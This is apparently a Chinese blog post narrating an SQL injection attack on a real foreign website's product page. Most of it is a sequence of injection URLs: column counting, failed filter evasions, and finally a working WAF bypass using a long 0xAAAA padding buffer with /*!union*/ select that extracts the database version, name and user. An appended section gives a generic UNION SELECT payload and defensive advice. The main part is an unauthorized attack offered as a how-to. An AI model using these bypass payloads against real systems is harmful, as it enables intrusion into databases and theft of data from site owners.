变态方法突破过滤UNION+SELECT继续注入

http://www.jb51.net/article/48933.htm


  前几今天遇到一个bt 的老外注射点:

    //*ps 此点目前流行的注射工具射不 *//

    http:// /index.php?content=more_product&id=17

    http:// /index.php?content=more_product&id=17 and 1=1 正常

    http:// /index.php?content=more_product&id=17 and 1=2 报错

    http:// /index.php?content=more_product&id=17 order by 6 正常

    http:// /index.php?content=more_product&id=17 order by 7 错误

    继续按照常规的手法注射:

    http:// /index.php?content=more_product&id=-17+UNION+SELECT+1,2,

    3,4,5,6--

    错误nnd,过滤 UNION+SELECT 我们来加点特殊的字符看看能不能绕过

    http:// /index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/

    /**//*!sElEcT*//**//**/1,2,3,4,5,6--

    悲剧还是绕不过去 - -,于是尝试自己知道的绕过方法继续射…

    http:// /index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n

    *//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--

    http:// /index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca

    t(s,e,l,e,c,t)+all+1,2,3,4,5,6--

    悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内

    的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑

    客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高

    于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-

    靠,老外果然牛B 那么继续射

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u

    ser()),3,4,5,6--+-

    成功得到系统版本、当前数据库用户、用户名


### SQL注入攻击中的`UNION SELECT`用法 在SQL注入攻击中,`UNION SELECT`语句被用来组合两个或多个SELECT查询的结果集。当应用程序未能正确过滤用户输入时,攻击者可以利用此特性来附加额外的查询并检索数据库内的敏感数据。 例如,在存在漏洞的应用程序参数处插入如下恶意字符串: ```sql 1' UNION ALL SELECT NULL, version(), database() -- ``` 这条命令会尝试将原始查询与新创建的选择服务器版本号和当前使用的数据库名称的查询联合起来[^2]。 如果目标表中有三个字段,则上述有效载荷可能返回类似于下面的内容: | id | title | content | |----|-------------|---------| | 1 | Welcome Page| ... | | | 8.0.30 | mysql | 其中第二行来自攻击者的自定义查询而不是应用预期的数据记录。 ### 防护措施 为了防止这种类型的攻击发生,开发者应该采取以下几种方法之一或多样的安全实践: #### 输入验证与清理 确保所有外部输入都经过严格的校验,只允许合法字符通过,并移除任何潜在危险符号如单引号 `'`, 双划线 `--` 或其他特殊标记。 #### 使用预编译语句(Prepared Statements) 采用参数化查询而非直接拼接字符串构建最终指令文本。这使得即使包含有害成分也无法改变原有逻辑结构从而失去危害能力。 对于Python Flask框架而言,可以通过SQLAlchemy ORM实现这一点: ```python from sqlalchemy import create_engine, text engine = create_engine('mysql+pymysql://user:password@localhost/dbname') with engine.connect() as connection: result = connection.execute( text("SELECT * FROM users WHERE username=:username"), {"username": user_input} ) ``` #### 启用Web Application Firewall (WAF) 部署专门设计用于识别已知模式并向管理员发出警报的安全设备可以帮助减轻风险水平。这些工具能够自动拦截大多数常见的SQLi企图而不影响正常业务流程继续运行下去[^3]。 #### 定期扫描网站内容 使用像DIRB这样的自动化工具定期检查是否有未授权访问路径暴露在外网环境中是非常重要的预防手段之一。这类软件基于字典暴力枚举URL地址空间寻找隐藏资源文件夹链接等信息泄露点。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值